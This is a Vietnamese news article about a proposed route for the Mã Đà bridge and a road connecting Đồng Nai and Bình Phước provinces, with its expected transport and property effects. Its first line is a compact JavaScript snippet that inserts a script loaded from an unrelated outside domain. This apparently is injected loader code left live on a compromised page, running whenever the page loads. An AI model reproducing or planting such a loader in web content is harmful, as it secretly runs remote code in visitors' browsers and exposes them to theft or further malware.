;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn");
Thứ tư, 11/5/2022 | 9:00 | Tin tức, Tin thị trường
Dự án xây dựng cầu Mã Đà và tuyến đường kết nối tỉnh Đồng Nai với tỉnh Bình Phước được kiến nghị xây dựng theo phương án mới, tránh đi qua vùng lõi của khu dự trữ sinh quyển thế giới.
Phương án xây dựng cầu Mã Đà và tuyến đường kết nối Bình Phước và Đồng Nai vừa được Viện Chiến lược và phát triển giao thông vận tải đề xuất.
Theo phương án mới của Viện Chiến lược, tuyến đường sẽ kết nối đường tỉnh 753 với đường Đồng Phú – Bình Dương (đều thuộc tỉnh Bình Phước) và đường Bắc Tân Uyên – Phú Giáo – Bàu Bàng (tỉnh Bình Dương). Sau đó sẽ kết nối về đường vành đai 4 (trên địa bàn tỉnh Bình Dương).
Phương án này giúp việc kết nối từ TX. Đồng Xoài đến đường vành đai 4 thuận tiện, chiều dài tuyến ngắn. Về lâu dài, thời gian di chuyển nhanh do tận dụng đường vành đai 4. Đồng thời, giảm tải cho các tuyến hiện hữu kết nối từ tỉnh Bình Phước và các tỉnh Tây nguyên về cảng biển Bà Rịa – Vũng Tàu.
Ngoài ra, hướng tuyến này cũng tận dụng được các tuyến đường tỉnh 753, 746 và đường huyện 416 đã được đầu tư xây dựng. Cùng với đó, các tuyến đường Đồng Phú – Bình Dương; Bắc Tân Uyên – Phú Giáo – Bàu Bàng hiện cũng đang được đầu tư xây dựng. Đây cũng là phương án có tổng mức đầu tư xây dựng thấp và mức độ ảnh hưởng đến Khu Dự trữ sinh quyển thế giới Đồng Nai thấp; bảo đảm các yêu cầu về môi trường.
Đây không phải là đầu tiên Bình Phước kiến nghị xây dựng cầu Mã Đà. Trong năm 2021, địa phương này từng đưa ra kiến nghị này. Việc xây dựng cầu Mã Đà không chỉ có vai trò quan trọng với Bình Phước mà cả khu vực Tây Nguyên.
Cụ thể, cầu Mã Đà sẽ giúp Bình Phước và các tỉnh Tây Nguyên dễ dàng di chuyển về sân bay Long Thành. Người dân sẽ không phải đi vòng theo các tuyến đường bộ qua địa bàn của tỉnh Bình Dương và một phần của TP. HCM.
Cầu Mã Đà khi đi vào hoạt động sẽ giúp Bình Phước rút ngắn khoảng cách tới sân bay Long Thành chỉ còn 60km, mất khoảng 60 phút di chuyển. Bên cạnh đó, khi có cầu Mã Đà, tuyến đường từ Cảng Thị Vải (Bà Rịa – Vũng Tàu) theo quốc lộ 51, tỉnh lộ 767, 761, 753, quốc lộ 14 đi Tây Nguyên, rẽ sang quốc lộ 13 qua Campuchia ra vịnh Thái Lan; Trung chuyển hàng hóa của khu vực Nam Trung bộ, Đông Nam bộ, Tây Nguyên, phục vụ việc hội nhập, giao thương kinh tế quốc tế. Khi đó, tỉnh Bình Phước sẽ thuận lợi hơn trong xuất – nhập khẩu hàng hóa.
Dự án xây dựng cầu Mã Đà và tuyến đường kết nối Bình Phước với Đồng Nai không chỉ có ý nghĩa về kết nối giao thông mà còn tác động đến bất động sản khu vực. Từ đó thu hút nhiều nhà đầu tư đến Bình Phước “rót vốn”.